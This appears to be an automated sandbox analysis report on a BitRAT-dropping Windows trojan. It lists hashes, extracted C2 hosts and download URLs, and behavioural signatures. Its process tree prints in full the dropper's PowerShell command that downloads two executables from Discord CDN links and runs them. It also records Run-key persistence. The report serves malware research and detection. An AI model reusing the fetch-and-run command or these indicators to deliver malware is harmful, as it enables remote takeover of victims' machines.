Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
29-01-2022 15:49
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe
Resource
win10-en-20211208
General
-
Target
SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe
-
Size
46KB
-
MD5
0c3281387e69e28ac3865135420ec039
-
SHA1
068bd09ad5f8dae225da6b53754823ed6f194973
-
SHA256
2d3c256a17925e5102852d2a9ecd212d9118ae9003b9c6cc064a598ef95e4891
-
SHA512
d8d7a8b678b37b91206db130cbefd522a8b6d3e1617acb981a1ae4367dc48c311ac64b9e973b14bdb0ff9cc6b62481f55b541791244b664907c95a29d9f9ceb0
Malware Config
Extracted
https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe
Extracted
https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe
Extracted
bitrat
1.38
linksphere.duckdns.org:1440
anubisgod.duckdns.org:1442
-
communication_password
81dc9bdb52d04dc20036dbd8313ed055
-
install_dir
Queeno
-
install_file
Queenol.exe
-
tor_process
tor
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 5 1372 powershell.exe 7 1788 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
hissbitrat.exemybitrat.exepid process 1196 hissbitrat.exe 1232 mybitrat.exe -
Loads dropped DLL 4 IoCs
Processes:
powershell.exepowershell.exepid process 1052 powershell.exe 1052 powershell.exe 992 powershell.exe 992 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
hissbitrat.exemybitrat.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe" hissbitrat.exe Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe" mybitrat.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
hissbitrat.exemybitrat.exepid process 1196 hissbitrat.exe 1196 hissbitrat.exe 1196 hissbitrat.exe 1196 hissbitrat.exe 1232 mybitrat.exe 1232 mybitrat.exe 1232 mybitrat.exe 1232 mybitrat.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 1372 powershell.exe 1788 powershell.exe 1052 powershell.exe 1052 powershell.exe 1052 powershell.exe 992 powershell.exe 992 powershell.exe 992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exehissbitrat.exemybitrat.exedescription pid process Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeDebugPrivilege 1196 hissbitrat.exe Token: SeShutdownPrivilege 1196 hissbitrat.exe Token: SeDebugPrivilege 1232 mybitrat.exe Token: SeShutdownPrivilege 1232 mybitrat.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
hissbitrat.exemybitrat.exepid process 1196 hissbitrat.exe 1196 hissbitrat.exe 1232 mybitrat.exe 1232 mybitrat.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
SecuriteInfo.com.Trojan.GenericKD.48131406.23753.execmd.exepowershell.exepowershell.exedescription pid process target process PID 1552 wrote to memory of 1528 1552 SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe cmd.exe PID 1552 wrote to memory of 1528 1552 SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe cmd.exe PID 1552 wrote to memory of 1528 1552 SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe cmd.exe PID 1552 wrote to memory of 1528 1552 SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe cmd.exe PID 1528 wrote to memory of 1372 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1372 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1372 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1372 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1788 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1788 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1788 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1788 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1052 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1052 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1052 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1052 1528 cmd.exe powershell.exe PID 1052 wrote to memory of 1196 1052 powershell.exe hissbitrat.exe PID 1052 wrote to memory of 1196 1052 powershell.exe hissbitrat.exe PID 1052 wrote to memory of 1196 1052 powershell.exe hissbitrat.exe PID 1052 wrote to memory of 1196 1052 powershell.exe hissbitrat.exe PID 1528 wrote to memory of 992 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 992 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 992 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 992 1528 cmd.exe powershell.exe PID 992 wrote to memory of 1232 992 powershell.exe mybitrat.exe PID 992 wrote to memory of 1232 992 powershell.exe mybitrat.exe PID 992 wrote to memory of 1232 992 powershell.exe mybitrat.exe PID 992 wrote to memory of 1232 992 powershell.exe mybitrat.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe')" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe'))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe'))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe')"3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\hissbitrat.exe"C:\Users\Admin\AppData\Roaming\hissbitrat.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe')"3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\mybitrat.exe"C:\Users\Admin\AppData\Roaming\mybitrat.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
76eef2d78f82e0490da18f9a464f0f7c
SHA1cd5639659eeeab962ede47c56baec3c9fcda3997
SHA2569a2e42224c333125f4f216607ec1518dce1122416fcae2472d110972f3405be0
SHA512442d548eb4d65f26b60c9bfadd67a05ab79fc7003a7bcfc90bab71467bc136434dc31f0cad8745a7c1c3dba07eac84c5aa111fc462605b60ec991fb73ea829f9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
76eef2d78f82e0490da18f9a464f0f7c
SHA1cd5639659eeeab962ede47c56baec3c9fcda3997
SHA2569a2e42224c333125f4f216607ec1518dce1122416fcae2472d110972f3405be0
SHA512442d548eb4d65f26b60c9bfadd67a05ab79fc7003a7bcfc90bab71467bc136434dc31f0cad8745a7c1c3dba07eac84c5aa111fc462605b60ec991fb73ea829f9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
76eef2d78f82e0490da18f9a464f0f7c
SHA1cd5639659eeeab962ede47c56baec3c9fcda3997
SHA2569a2e42224c333125f4f216607ec1518dce1122416fcae2472d110972f3405be0
SHA512442d548eb4d65f26b60c9bfadd67a05ab79fc7003a7bcfc90bab71467bc136434dc31f0cad8745a7c1c3dba07eac84c5aa111fc462605b60ec991fb73ea829f9
-
C:\Users\Admin\AppData\Roaming\hissbitrat.exeMD5
09931bfc16fb78b4b9952931b70146a8
SHA14f2bc81788297b42d31d4468293cd5ae550df606
SHA2563fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d
SHA512b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158
-
C:\Users\Admin\AppData\Roaming\hissbitrat.exeMD5
09931bfc16fb78b4b9952931b70146a8
SHA14f2bc81788297b42d31d4468293cd5ae550df606
SHA2563fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d
SHA512b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158
-
C:\Users\Admin\AppData\Roaming\mybitrat.exeMD5
fa6bfb0013165303096d3eb53ca7ed7a
SHA16b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d
SHA256445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7
SHA5122cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a
-
C:\Users\Admin\AppData\Roaming\mybitrat.exeMD5
fa6bfb0013165303096d3eb53ca7ed7a
SHA16b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d
SHA256445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7
SHA5122cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a
-
\Users\Admin\AppData\Roaming\hissbitrat.exeMD5
09931bfc16fb78b4b9952931b70146a8
SHA14f2bc81788297b42d31d4468293cd5ae550df606
SHA2563fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d
SHA512b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158
-
\Users\Admin\AppData\Roaming\hissbitrat.exeMD5
09931bfc16fb78b4b9952931b70146a8
SHA14f2bc81788297b42d31d4468293cd5ae550df606
SHA2563fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d
SHA512b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158
-
\Users\Admin\AppData\Roaming\mybitrat.exeMD5
fa6bfb0013165303096d3eb53ca7ed7a
SHA16b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d
SHA256445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7
SHA5122cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a
-
\Users\Admin\AppData\Roaming\mybitrat.exeMD5
fa6bfb0013165303096d3eb53ca7ed7a
SHA16b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d
SHA256445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7
SHA5122cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a
-
memory/992-74-0x0000000002440000-0x000000000308A000-memory.dmpFilesize
12.3MB
-
memory/1052-68-0x0000000002410000-0x000000000305A000-memory.dmpFilesize
12.3MB
-
memory/1372-55-0x0000000075B11000-0x0000000075B13000-memory.dmpFilesize
8KB
-
memory/1372-56-0x00000000023A0000-0x0000000002FEA000-memory.dmpFilesize
12.3MB
-
memory/1788-61-0x00000000023F0000-0x000000000303A000-memory.dmpFilesize
12.3MB